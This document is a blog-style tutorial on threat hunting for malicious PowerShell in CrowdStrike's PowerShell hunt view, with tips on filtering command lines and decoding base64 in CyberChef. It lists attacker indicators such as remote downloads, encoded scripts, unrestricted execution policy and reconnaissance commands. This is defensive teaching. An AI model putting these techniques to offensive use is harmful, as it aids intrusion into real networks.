PowerShell is an amazing tool for scripting and developing automation. It has helped me save so much time in setting up rules, policies, software, and small details on an enterprise level. I’m going to go through the hunting process when trying to investigate for malware on the network via PowerShell hunt in CrowdStrike.
CrowdStrike is an amazing company that has been around for some time. While they do catch a lot of malicious activity, they can’t possibly catch everything as each environment it different and understanding what is and isn’t malicious falls on the security engineers and IT professionals. This is why it is important to stay vigilant and understand your organizations environment so that you can find malicious activity.
Within CrowdStrike you will have to click on the three lines icon, select Investigate and select “PowerShell hunt” This will then take you to the PowerShell hunting window.
Once you get here you will see a lot of information floating around. Much of it will be non-malicious PowerShell scripts. Before we begin, there are several things CrowdStrike Points out, to keep in mind.
What to look for in PowerShell
Examples of suspicious activities in PowerShell that warrant further investigation include:
- Downloaded files, especially from outside your organization. Attackers frequently download late-stage malware and tools from sites such as github, or their own staging infrastructure.
- Obfuscated or encoded scripts. Administrators very rarely have a need to obfuscate their scripts, as this greatly complicates future maintenance and troubleshooting. Seeing PowerShell scripts that are encoded merits a deeper look.
- Unusual command line arguments. PowerShell provides a wide range of command line arguments that allow administrators to set the execution context and control how PowerShell operates. -ExecutionPolicy Unrestricted allows scripts to run without standard OS restrictions. Other arguments can suppress user warnings or dialogs that might otherwise alert a user or administrator to an intrusion. These arguments are rarely used in most enterprise environments.
- Repeated use of local informational tools. Attackers frequently use local commands such as whoami, hostname, ping, netstat, and similar commands during their initial reconnaissance, in order to orient themselves after an initial intrusion. On the other hand, it’s much more rare for an authorized administrator to do these things, as they typically know what systems they are accessing, and the account context they are working under.
Once you have an idea of what you are looking for you will be able to find the true positive activity easier. Keep in mind that not everything is malicious, and to that malicious PowerShell activity is not common to any environment.
The first thing you want to do when you get to the following window, is notice the Command Line information. This will give you an indication on what to avoid when parsing through the PowerShell logs. Below is an example for introducing you to the concept.
I have edited out the information, but in the Command Line information you will see what the PowerShell commands are doing. If you are new to threat hunting, you will have to start from scratch on investigating everything until you get an idea of what is on your network. If you are somewhat familiar with your network environment, you may know what you are seeing in the command line section of the investigation.
The basic idea that you want to parse through all the data using the filtering conditions that it tells you, but on the software that you use in your environment.
CommandLine!=”*Microsoft Monitoring Agent*” AND CommandLine!=”*Microsoft\SCCM\*”
The above filtering condition command is something you might see for filtering out the Microsoft monitoring agent and Configuration Manager PowerShell scripts that you might find in a Windows environment. You want to keep adding more and more exclusionary criteria until you end up with rare, strange PowerShell commands you can’t explain. Then you will have to investigate those until you come to the conclusion that they are false positive, or true positives. Then you can plan your actions accordingly.
Be sure to pay attention to the obfuscation of the PowerShell commands. Sometimes it’s as simple as being encoded using base64, and other times, it can be obfuscated multiple times. Pay particular attention to the below indicators to help you assess these things.
They will tell you what is obfuscated and how (sometimes). You can take this obfuscated PowerShell command and plug it into CyberChef to come up with an idea of what to look for.
If you haven’t used CyberChef before, it’s a great tool that has helped me discover new and interesting encoded commands. you can go to https://cyberchef.org to see what it is like.
When you input encoded commands, you can select what type of encoding it used to decode it. For example, I was able to decode the following base64 message to find out that a PowerShell script was going to download another PowerShell script from a website.
This is just one example of the power CyberChef has. It can go much much deeper than the example I gave. You just have to experiment with it and see how it can help you.
I really wanted to focus on understanding how to hunt PowerShell scripts within CrowdStrike while using CyberChef. My hope is that this will help you become better at recognizing threats within your environments. This should at least point you in the right direction for basic threat hunting and investigation of PowerShell scripts in CrowdStrike and your environment.